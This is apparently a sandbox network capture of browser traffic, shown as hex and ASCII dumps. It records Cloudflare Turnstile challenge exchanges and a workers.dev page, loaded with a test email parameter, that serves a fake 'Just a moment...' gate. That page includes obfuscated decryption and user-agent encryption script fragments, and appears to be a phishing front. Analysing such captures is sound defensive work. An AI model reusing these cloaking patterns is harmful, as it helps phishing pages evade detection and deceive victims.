2025-01-15 19:05:58 UTC	1369	IN	Data Raw: 4d 5b 68 6e 28 31 35 31 35 29 5d 5b 68 6e 28 31 33 32 38 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 6e 28 31 35 31 35 29 5d 5b 68 6e 28 31 33 31 37 29 5d 2c 27 63 6f 64 65 27 3a 68 6e 28 34 38 38 29 2c 27 72 63 56 27 3a 65 4d 5b 68 6e 28 31 35 31 35 29 5d 5b 68 6e 28 31 30 32 37 29 5d 7d 2c 27 2a 27 29 29 3a 28 6b 3d 74 68 69 73 2e 68 5b 65 5b 68 6e 28 34 39 37 29 5d 28 74 68 69 73 2e 68 5b 31 31 35 2e 32 35 5e 74 68 69 73 2e 67 5d 5b 33 5d 5e 65 5b 68 6e 28 31 37 36 30 29 5d 28 74 68 69 73 2e 68 5b 65 5b 68 6e 28 31 35 32 35 29 5d 28 31 31 35 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 68 6e 28 38 36 32 29 5d 28 74 68 69 73 2e 68 5b 65 5b 68 6e 28 31 35 32 35 29 5d 28 31 31 35 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 2d 37 33 2c 32 35 36 29 Data Ascii: M[hn(1515)][hn(1328)],'cfChlOutS':eM[hn(1515)][hn(1317)],'code':hn(488),'rcV':eM[hn(1515)][hn(1027)]},'*')):(k=this.h[e[hn(497)](this.h[115.25^this.g][3]^e[hn(1760)](this.h[e[hn(1525)](115,this.g)][1][hn(862)](this.h[e[hn(1525)](115,this.g)][0]++)-73,256)
2025-01-15 19:05:58 UTC	1369	IN	Data Raw: 65 74 75 72 6e 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 73 3d 28 6f 3d 7b 7d 2c 6f 5b 68 6f 28 31 31 34 37 29 5d 3d 65 4d 5b 68 6f 28 31 35 31 35 29 5d 5b 68 6f 28 31 31 34 37 29 5d 2c 6f 5b 68 6f 28 39 31 37 29 5d 3d 65 4d 5b 68 6f 28 31 35 31 35 29 5d 5b 68 6f 28 39 31 37 29 5d 2c 6f 5b 68 6f 28 31 34 33 36 29 5d 3d 65 4d 5b 68 6f 28 31 35 31 35 29 5d 5b 68 6f 28 31 34 33 36 29 5d 2c 6f 5b 68 6f 28 31 34 38 39 29 5d 3d 65 4d 5b 68 6f 28 31 35 31 35 29 5d 5b 68 6f 28 31 31 31 32 29 5d 2c 6f 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 78 3d 6e 65 77 20 65 4d 5b 28 68 6f 28 31 33 35 30 29 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 38 27 3a 42 3d 67 62 5b 68 6f 28 39 34 31 29 5d 28 44 29 5b 68 6f 28 31 31 33 34 29 5d Data Ascii: eturn;continue;case'6':s=(o={},o[ho(1147)]=eM[ho(1515)][ho(1147)],o[ho(917)]=eM[ho(1515)][ho(917)],o[ho(1436)]=eM[ho(1515)][ho(1436)],o[ho(1489)]=eM[ho(1515)][ho(1112)],o);continue;case'7':x=new eM[(ho(1350))]();continue;case'8':B=gb[ho(941)](D)[ho(1134)]
2025-01-15 19:05:58 UTC	1369	IN	Data Raw: 5b 32 5d 2c 31 30 29 2c 69 3d 65 5b 68 70 28 31 34 35 33 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 33 5d 2c 31 30 29 29 29 3a 64 5b 68 70 28 39 30 35 29 5d 28 29 29 3b 65 6c 73 65 7b 69 66 28 73 3d 7b 27 6f 6e 50 46 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 76 2c 78 2c 68 71 29 7b 72 65 74 75 72 6e 20 68 71 3d 68 70 2c 65 5b 68 71 28 31 38 38 39 29 5d 28 76 2c 78 29 7d 7d 2c 66 28 29 29 72 65 74 75 72 6e 3b 65 5b 68 70 28 31 34 35 33 29 5d 28 67 2c 65 5b 68 70 28 31 30 31 30 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 76 2c 68 72 29 7b 68 72 3d 68 70 2c 76 5b 68 72 28 36 34 31 29 5d 3d 73 5b 68 72 28 38 39 33 29 5d 28 69 2c 68 72 28 31 38 34 32 29 29 7d 29 7d 7d 7d 65 6c 73 65 20 65 5b 68 70 28 36 34 31 29 5d 3d 66 28 68 70 28 31 35 36 37 29 29 7d 65 6c 73 65 20 66 3d Data Ascii: [2],10),i=e[hp(1453)](parseInt,l[3],10))):d[hp(905)]());else{if(s={'onPFz':function(v,x,hq){return hq=hp,e[hq(1889)](v,x)}},f())return;e[hp(1453)](g,e[hp(1010)],function(v,hr){hr=hp,v[hr(641)]=s[hr(893)](i,hr(1842))})}}}else e[hp(641)]=f(hp(1567))}else f=
2025-01-15 19:05:59 UTC	1369	IN	Data Raw: 2c 66 4b 3d 21 5b 5d 2c 21 66 62 28 67 4a 28 31 33 35 36 29 29 26 26 28 67 38 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 53 2c 63 2c 64 2c 65 29 7b 69 53 3d 67 4a 2c 63 3d 7b 27 66 47 63 67 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 51 48 68 43 67 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 4e 6b 65 50 71 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2d 67 7d 7d 2c 64 3d 65 4d 5b 69 53 28 31 35 31 35 29 5d 5b 69 53 28 31 34 32 30 29 5d 7c 7c 31 65 34 2c 65 3d 63 5b 69 53 28 31 35 32 31 29 5d 28 67 36 29 2c 21 65 4d 5b 69 53 28 31 39 30 35 29 5d 26 26 21 63 5b 69 53 28 37 38 35 29 5d 28 66 4c 29 26 26 21 65 4d 5b 69 53 28 Data Ascii: ,fK=![],!fb(gJ(1356))&&(g8(),setInterval(function(iS,c,d,e){iS=gJ,c={'fGcgJ':function(f){return f()},'QHhCg':function(f){return f()},'NkePq':function(f,g){return f-g}},d=eM[iS(1515)][iS(1420)]\|\|1e4,e=c[iS(1521)](g6),!eM[iS(1905)]&&!c[iS(785)](fL)&&!eM[iS(
2025-01-15 19:05:59 UTC	1369	IN	Data Raw: 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 6c 67 53 6e 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 54 5a 59 53 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 45 6e 4c 58 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 43 4f 79 41 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 64 54 53 57 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 69 42 69 42 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 7a 53 48 75 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 Data Ascii: nction(h,i){return h-i},'lgSnb':function(h,i){return h>i},'TZYSo':function(h,i){return i&h},'EnLXP':function(h,i){return h(i)},'COyAi':function(h,i){return h<i},'dTSWK':function(h,i){return i==h},'iBiBh':function(h,i){return h\|i},'zSHuu':function(h,i){ret

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:05:58 UTC	739	OUT	GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5ourm/0x4AAAAAAA44TVMLbqDkCk-m/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:05:59 UTC	240	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 19:05:58 GMT Content-Type: image/png Content-Length: 61 Connection: close cache-control: max-age=2629800, public Server: cloudflare CF-RAY: 902823ef7ea09e08-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 19:05:59 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRsIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:05:59 UTC	664	OUT	GET /favicon.ico HTTP/1.1 Host: 52f1897b.5648702dd4d5255cab645104.workers.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:05:59 UTC	791	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 19:05:59 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7k7CH9l71urJVNahEaQpuQ4zKrXp3jjSt8pskFekiLsv2HhzwGUj2qE4x%2FDjEDy1%2FcY7SqJmqJn2mDGlGvvFAirdxyeVmRHcRXAHJh3wy3fuvqV5HPxMrQPAHlznD8FZp8hMRRkQ%2FZkm0Ezz0XuXkJAJtp65Hq4TZ%2BCkbWd7FII%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902823f1fce8ab08-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14148&min_rtt=14148&rtt_var=5307&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2899&recv_bytes=1242&delivery_rate=206302&cwnd=32&unsent_bytes=0&cid=e01bdaf9779811c1&ts=3495&x=0"
2025-01-15 19:05:59 UTC	578	IN	Data Raw: 31 36 37 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 20 0a 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 3c 2f 73 63 72 69 70 74 3e 20 0a 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 Data Ascii: 1678<!doctype html><html lang="en-US"><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-sc
2025-01-15 19:05:59 UTC	1369	IN	Data Raw: 20 20 73 69 74 65 6b 65 79 3a 20 22 30 78 34 41 41 41 41 41 41 41 34 34 54 56 4d 4c 62 71 44 6b 43 6b 2d 6d 22 2c 20 0a 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 3a 20 76 65 72 69 66 79 43 61 6c 6c 62 61 63 6b 5f 43 46 2c 0a 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 68 68 32 28 65 6e 63 72 79 70 74 65 64 54 65 78 74 2c 20 73 68 69 66 74 29 20 7b 0a 20 20 20 20 20 20 6c 65 74 20 64 65 63 72 79 70 74 65 64 54 65 78 74 20 3d 20 22 22 3b 0a 20 20 20 20 20 20 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 65 6e 63 72 79 70 74 65 64 54 65 78 74 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 20 63 20 3d 20 65 6e 63 72 79 70 74 65 64 54 65 78 74 5b 69 5d 3b 0a Data Ascii: sitekey: "0x4AAAAAAA44TVMLbqDkCk-m", callback: verifyCallback_CF, }); }; function hh2(encryptedText, shift) { let decryptedText = ""; for (let i = 0; i < encryptedText.length; i++) { let c = encryptedText[i];
2025-01-15 19:05:59 UTC	1369	IN	Data Raw: 2d 60 3b 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 52 65 71 75 65 73 74 28 29 20 7b 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 75 73 65 72 41 67 65 6e 74 20 3d 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 3b 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 45 6e 63 72 79 70 74 65 64 55 73 65 72 41 67 65 6e 74 20 3d 20 45 6e 63 72 79 70 74 28 75 73 65 72 41 67 65 6e 74 2c 20 50 55 42 4c 49 43 5f 4b 45 59 29 3b 0a 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 53 65 6e 64 69 6e 67 20 72 65 71 75 65 73 74 20 77 69 74 68 20 65 6e 63 72 79 70 74 65 64 20 75 73 65 72 2d 61 67 65 6e 74 3a 27 2c 20 45 6e 63 72 79 70 74 65 64 55 73 65 72 41 67 65 6e 74 29 3b 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 6c 65 74 20 78 68 72 20 3d 20 6e 65 77 Data Ascii: -`; function sendRequest() { const userAgent = navigator.userAgent; const EncryptedUserAgent = Encrypt(userAgent, PUBLIC_KEY); console.log('Sending request with encrypted user-agent:', EncryptedUserAgent); let xhr = new
2025-01-15 19:05:59 UTC	1369	IN	Data Raw: 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 7d 2e 66 6f 6f 74 65 72 2c 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b Data Ascii: olor:transparent;text-decoration:none;color:#0051c3}a:hover{text-decoration:underline;color:#ee730a}.main-content{margin:8rem auto;width:100%;max-width:60rem}.footer,.main-content{padding-right:1.5rem;padding-left:1.5rem}.main-wrapper{display:flex;flex:1;
2025-01-15 19:05:59 UTC	1075	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 7d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 68 31 20 7a 6f 6e 65 2d 6e 61 6d 65 Data Ascii: -color-scheme:dark){body{background-color:#222;color:#d9d9d9}a{color:#fff}a:hover{text-decoration:underline;color:#ee730a}}</style><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="h1 zone-name
2025-01-15 19:05:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:05:59 UTC	1171	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1497844684:1736965888:hR1bQafLozQXnmaBH5lAypMI_u7ggQ5Cnikt2oePCQI/902823eb1c368c99/ae1BCWt9k0HcV1Stw.aqaNNjGsPp.vEgo6dugpndcQs-1736967958-1.1.1.1-SrGUcSV2bImxYiTTejixzDrtDboHC6MPNX7hfWvhi72sA8.3NMOByHbV8EB8W0OX HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 3323 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded CF-Chl-RetryAttempt: 0 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: ae1BCWt9k0HcV1Stw.aqaNNjGsPp.vEgo6dugpndcQs-1736967958-1.1.1.1-SrGUcSV2bImxYiTTejixzDrtDboHC6MPNX7hfWvhi72sA8.3NMOByHbV8EB8W0OX sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5ourm/0x4AAAAAAA44TVMLbqDkCk-m/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:05:59 UTC	3323	OUT	Data Raw: 76 5f 39 30 32 38 32 33 65 62 31 63 33 36 38 63 39 39 3d 2d 68 48 59 6b 59 4f 59 52 59 6f 59 53 5a 43 58 5a 43 6c 59 5a 50 65 47 77 57 50 43 69 5a 71 71 43 6e 73 43 65 4c 59 5a 39 43 4b 59 65 48 57 65 33 39 48 43 42 41 39 43 24 72 5a 4a 2d 43 74 59 5a 6c 48 43 65 79 49 68 25 32 62 37 43 79 47 43 75 43 5a 68 43 79 48 51 4c 43 73 43 2b 4c 65 71 43 47 4c 41 48 43 52 2d 72 2b 57 69 43 35 42 41 53 35 61 6d 79 47 2b 71 71 51 4c 65 73 67 43 77 48 2b 75 46 4f 36 39 71 76 43 2d 75 45 66 46 69 39 44 50 61 48 43 5a 38 43 41 6f 33 43 48 34 38 79 4e 4c 43 76 4a 43 43 4a 59 65 39 6d 33 52 54 76 45 42 51 4d 55 39 41 70 4a 38 36 5a 6d 47 43 42 34 6b 54 48 43 5a 4e 4d 34 59 79 74 43 2b 71 50 4c 43 4a 6e 34 41 51 32 41 43 43 54 59 5a 73 43 48 32 69 42 79 50 43 46 56 68 43 Data Ascii: v_902823eb1c368c99=-hHYkYOYRYoYSZCXZClYZPeGwWPCiZqqCnsCeLYZ9CKYeHWe39HCBA9C$rZJ-CtYZlHCeyIh%2b7CyGCuCZhCyHQLCsC+LeqCGLAHCR-r+WiC5BAS5amyG+qqQLesgCwH+uFO69qvC-uEfFi9DPaHCZ8CAo3CH48yNLCvJCCJYe9m3RTvEBQMU9ApJ86ZmGCB4kTHCZNM4YytC+qPLCJn4AQ2ACCTYZsCH2iByPCFVhC
2025-01-15 19:06:00 UTC	751	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 19:05:59 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 153144 Connection: close cf-chl-gen: Sve8y6jBTbZ8vgbbX9e26qgY2bx0f616c3O48XcMgzAIuMRhw/VA+EXmrCA5EHH2XaXuGzJ6Hdkuana+JgaR0E0YuBtuIFGDrd6rOJB1erQsMlmLc9SiROt6Y0vvIIPTAijEe9/Xt7dazCOkh/7ZZmD2zXcOWsvO/FJg4x7TRekrCiSKPIbtieOsx499cB8QDktXdNpWF9FMYFLJYwQ1AMoIbZ8QpRz3fYR0YSHdbz97FALlUuMvGYA5OjoDvcOGE0QNUHARx6QMDh8d4yd5vTS/I1kv5EEXgrqjsDrJN/d24stNVHs7dgp2Y+vFLOpKannzwGbkty8NnR2afkfJZlDRTNc9HUPmIkOpzrYs+7LYnY0IG5jqmLAqK7Fqt4frGG3rjwUCrSL59IZBbRMlmg1nimjTSbVwgbrYG+AFUzj+3OfsvfBm5zvkmqaAiJ5vmT5cNgJq3oJRh7DM0+9VfoDxxpQcHIJ5Oi7D0pnJnWY=$vCLHAEZcWPPa+xFAYAouvg== Server: cloudflare CF-RAY: 902823f5af11de97-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 19:06:00 UTC	618	IN	Data Raw: 76 49 43 72 75 4c 39 2b 75 48 69 30 6c 35 65 71 76 59 57 67 68 4b 58 42 76 39 47 6c 31 61 57 54 6a 74 47 7a 71 70 57 6c 72 5a 43 71 71 2b 4c 50 6c 62 76 43 73 4e 7a 62 32 4b 58 56 79 38 66 58 36 64 2f 45 36 4e 2b 77 33 65 37 30 34 63 62 61 73 2f 7a 50 73 4f 44 65 41 64 33 73 37 51 4c 67 78 74 54 35 41 65 6e 70 43 65 37 75 37 51 48 39 38 77 67 4a 37 42 54 69 44 4f 54 38 38 4f 2f 30 45 41 76 7a 2b 42 66 67 2f 50 41 61 49 4e 73 55 46 68 2f 71 4a 51 59 65 42 53 4d 30 39 50 4d 4c 45 42 49 6f 45 66 59 7a 43 44 73 36 4f 68 44 30 50 6a 34 63 51 55 6c 45 4f 68 38 38 2f 6a 6f 68 53 30 6b 7a 55 69 51 77 43 43 4a 44 57 6c 51 4e 46 43 59 34 58 6b 30 78 4d 43 39 52 48 79 4d 77 51 6b 6c 49 4f 56 59 2f 52 79 5a 6e 4a 32 4e 45 4a 6d 45 76 4c 69 39 50 53 46 52 64 64 46 56 Data Ascii: vICruL9+uHi0l5eqvYWghKXBv9Gl1aWTjtGzqpWlrZCqq+LPlbvCsNzb2KXVy8fX6d/E6N+w3e704cbas/zPsODeAd3s7QLgxtT5AenpCe7u7QH98wgJ7BTiDOT88O/0EAvz+Bfg/PAaINsUFh/qJQYeBSM09PMLEBIoEfYzCDs6OhD0Pj4cQUlEOh88/johS0kzUiQwCCJDWlQNFCY4Xk0xMC9RHyMwQklIOVY/RyZnJ2NEJmEvLi9PSFRddFV
2025-01-15 19:06:00 UTC	1369	IN	Data Raw: 43 4a 5a 70 47 4e 63 31 4e 6f 6a 34 71 48 56 32 78 61 6a 33 46 37 67 4a 61 4f 6b 6f 43 46 59 35 69 48 59 71 74 30 68 32 32 42 6a 59 78 72 61 61 39 78 64 6e 47 6b 6d 59 64 30 71 4c 31 36 69 62 69 75 6c 4d 4b 53 65 38 43 65 74 4a 65 57 78 4c 54 49 75 62 6a 43 7a 37 4b 78 6b 73 53 52 79 4b 33 55 78 62 57 72 76 62 44 59 6e 37 69 34 72 36 2b 76 7a 36 57 37 74 65 6d 37 35 38 4f 73 72 38 48 4d 32 38 7a 70 33 74 61 31 74 4e 58 47 79 72 71 32 2b 4d 6a 64 37 75 48 55 76 67 57 39 32 2f 48 31 36 51 54 70 32 4d 62 67 34 4e 76 66 45 4f 63 4c 39 77 6a 71 31 41 6f 47 38 42 48 59 45 39 66 37 4a 41 34 6b 38 78 49 64 46 2b 6e 6c 41 76 77 4a 45 4f 67 65 4c 4f 7a 7a 35 68 49 51 42 42 4d 52 37 44 6e 30 2b 52 34 64 4f 53 42 42 4d 51 56 47 4a 7a 77 6c 53 51 63 69 49 55 73 6e 42 Data Ascii: CJZpGNc1Noj4qHV2xaj3F7gJaOkoCFY5iHYqt0h22BjYxraa9xdnGkmYd0qL16ibiulMKSe8CetJeWxLTIubjCz7KxksSRyK3UxbWrvbDYn7i4r6+vz6W7tem758Osr8HM28zp3ta1tNXGyrq2+Mjd7uHUvgW92/H16QTp2Mbg4NvfEOcL9wjq1AoG8BHYE9f7JA4k8xIdF+nlAvwJEOgeLOzz5hIQBBMR7Dn0+R4dOSBBMQVGJzwlSQciIUsnB
2025-01-15 19:06:00 UTC	1369	IN	Data Raw: 54 67 48 68 37 69 58 4a 73 65 49 2b 4d 6a 70 69 55 62 48 47 67 6d 33 6d 63 61 5a 65 48 6e 34 46 6d 68 58 35 70 69 49 75 53 72 49 61 42 74 62 42 78 65 6e 75 66 71 49 35 35 6c 5a 68 36 72 63 4f 2f 6b 4a 36 42 6f 71 32 48 74 35 79 6d 79 4d 75 2b 70 38 79 6a 70 71 54 49 7a 63 69 73 7a 4c 57 72 7a 35 33 66 7a 64 53 68 74 37 57 31 36 4f 48 57 6e 75 79 35 76 74 6a 43 34 2b 44 68 7a 73 76 30 77 2f 6a 33 2b 64 4c 30 31 62 58 53 2b 50 72 4d 2f 73 37 50 2f 4e 44 37 42 67 77 41 41 75 38 47 78 38 33 49 7a 75 62 4e 43 66 59 54 39 67 50 31 44 52 49 4a 38 64 66 38 45 41 51 58 35 42 49 51 38 68 76 67 43 43 54 35 42 41 63 52 36 76 34 54 38 79 72 75 49 54 63 47 41 79 34 79 47 52 41 52 4f 69 6f 4f 41 68 63 54 47 69 6c 47 4e 6a 39 49 47 54 34 65 52 30 4d 2f 44 6a 38 53 52 43 Data Ascii: TgHh7iXJseI+MjpiUbHGgm3mcaZeHn4FmhX5piIuSrIaBtbBxenufqI55lZh6rcO/kJ6Boq2Ht5ymyMu+p8yjpqTIzciszLWrz53fzdSht7W16OHWnuy5vtjC4+Dhzsv0w/j3+dL01bXS+PrM/s7P/ND7BgwAAu8Gx83IzubNCfYT9gP1DRIJ8df8EAQX5BIQ8hvgCCT5BAcR6v4T8yruITcGAy4yGRAROioOAhcTGilGNj9IGT4eR0M/Dj8SRC
2025-01-15 19:06:00 UTC	1369	IN	Data Raw: 56 49 79 62 57 6e 75 56 6c 6e 70 64 65 32 64 30 6c 57 56 2f 71 49 4b 4b 6a 71 79 63 6b 57 75 4f 69 48 4b 46 68 71 5a 36 64 4a 75 6f 6f 4c 79 51 77 4a 65 2b 66 71 44 49 78 4c 36 45 6c 63 61 72 74 73 4c 4d 6f 49 54 4a 6e 4d 47 50 70 5a 48 42 7a 71 61 70 6c 64 61 79 76 72 69 37 30 4f 43 32 76 4e 7a 58 35 62 62 44 74 73 33 57 37 38 50 70 73 4d 37 45 36 72 50 33 2b 4e 72 30 73 37 72 33 35 75 67 43 39 38 2f 69 2f 74 6f 49 32 66 62 45 78 50 77 43 41 76 6e 63 2f 65 38 43 41 38 34 43 35 76 45 43 31 2b 37 6c 39 77 6e 57 31 66 41 57 38 65 4d 50 2f 52 59 48 43 52 49 54 49 41 51 6a 4a 69 67 49 47 68 49 4d 4e 69 33 75 41 66 63 61 46 66 59 4c 4f 78 63 57 44 2f 67 42 45 66 78 48 45 44 49 6a 4e 6a 38 4d 46 55 56 50 53 56 42 4d 4f 78 46 43 56 68 63 6b 4a 69 63 30 4a 42 73 Data Ascii: 